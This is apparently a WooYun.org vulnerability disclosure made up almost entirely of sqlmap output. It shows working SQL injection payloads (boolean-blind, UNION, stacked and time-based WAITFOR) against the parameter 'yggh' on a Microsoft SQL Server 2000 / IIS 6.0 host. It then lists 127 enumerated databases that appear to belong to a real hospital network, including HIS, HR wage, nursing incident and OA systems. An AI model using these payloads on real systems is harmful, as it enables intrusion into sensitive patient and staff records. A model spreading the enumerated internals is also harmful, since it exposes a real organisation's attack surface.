WooYun.org

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: yggh
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: yggh=J9418' AND 5506=5506 AND 'YGzo'='YGzo
    Type: UNION query
    Title: Generic UNION query (NULL) - 7 columns
    Payload: yggh=J9418' UNION ALL SELECT NULL,NULL,NULL,CHAR(58) CHAR(119) CHAR(103) CHAR(114) CHAR(58) CHAR(76) CHAR(104) CHAR(89) CHAR(77) CHAR(115) CHAR(115) CHAR(104) CHAR(100) CHAR(115) CHAR(77) CHAR(58) CHAR(116) CHAR(98) CHAR(113) CHAR(58),NULL,NULL,NULL-- 
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: yggh=J9418'; WAITFOR DELAY '0:0:5'--
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: yggh=J9418' WAITFOR DELAY '0:0:5'--
---
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2000
available databases [28]:
[*] CMS2003
[*] crf
[*] Forums
[*] HIS
[*] hytz
[*] IntraForums
[*] LWPortalDB
[*] LWportalSite
[*] LWXQSL
[*] LZX_hytz
[*] master
[*] model
[*] msdb
[*] Northwind
[*] OGManagement
[*] PharmForums
[*] PortalASPDB
[*] pubs
[*] rj_pxb
[*] RJPortalDB
[*] rjyy_jyk
[*] RuijinOA
[*] SPS01_Config_db
[*] tempdb
[*] webdbdns,1434
[*] 瑞金内网门户1_PROF
[*] 瑞金内网门户1_SERV
[*] 瑞金内网门户1_SITE

available databases [99]:
[*] ChuKeAssessment
[*] db_ExamOnline
[*] EndocrineQuestionnaire
[*] EndocrineQuestionnaire_JS
[*] ExcellentManagerApply
[*] FORMDB
[*] Forum
[*] HF_HRDB
[*] HIS_JBDM_DB
[*] HR_ExcellentYouthAssessment
[*] HR_PerformanceAssessment
[*] HR_WageQuery
[*] HRDB
[*] HRDB_LOG
[*] IntertidCMS
[*] IntertidPermissions
[*] IntertidWebApp
[*] master
[*] model
[*] msdb
[*] OA_AbroadRequest
[*] OA_AdvanceRequest
[*] OA_APPDB
[*] OA_ArchiveList
[*] OA_AudioVisual
[*] OA_Budget
[*] OA_ClinicalReimbursement
[*] OA_ClinicScheduling
[*] OA_CommunistPartyMemberManage
[*] OA_ConsultRequest
[*] OA_CPDCirculation
[*] OA_DoctorSelectCourse
[*] OA_DoctorsScheduling
[*] OA_DonateApprove
[*] OA_EndocrineDataMaintain
[*] OA_EndocrineResearchManagement
[*] OA_EnrytSystem
[*] OA_EthicExam
[*] OA_GuardSafetyManagement
[*] OA_HospitalScheduling
[*] OA_HREvaluation
[*] OA_HRNEEvaluation
[*] OA_Infection
[*] OA_MiniApplication
[*] OA_NursePapers
[*] OA_NurseScheduling
[*] OA_NurseSelectCourse
[*] OA_NursingIncidentReport
[*] OA_OnlineTraining
[*] OA_OutApprove
[*] OA_OutWorkingRequest
[*] OA_PersonModule
[*] OA_Platform
[*] OA_PSApplication
[*] OA_Reimbursement
[*] OA_Resignation
[*] OA_Satisfaction
[*] OA_StudentSelectCourse
[*] OA_Survey
[*] OA_SurveyLead
[*] OA_Task
[*] OA_Task135
[*] OA_TeachingAssessment
[*] OA_Unions
[*] OA_Vote
[*] Portal_Application
[*] PS_Conference
[*] PS_Contact
[*] PS_EmsSms
[*] PS_ExchangeApp
[*] PS_Framework
[*] PS_LogService
[*] PS_Monitor
[*] PS_Portal
[*] PS_SchedulingService
[*] PS_SecurityService
[*] PS_Task
[*] PS_Workflow
[*] Questionnaire
[*] ReportServer
[*] ReportServerNew
[*] ReportServerNewTempDB
[*] ReportServerTempDB
[*] ReservationPlatform
[*] RJCRMAPPDB
[*] RJDJDNT
[*] RJOA
[*] RJWZ
[*] RJWZCY
[*] RSSDB
[*] ruijinCMS2010
[*] RuijinHRApplication
[*] RuijinResume_WUXI_FYJ
[*] RuijinResume_WUXI_YJ
[*] ServicePlatform
[*] tempdb
[*] Test
[*] TNBDCWJ
[*] VolunteerServiceCenter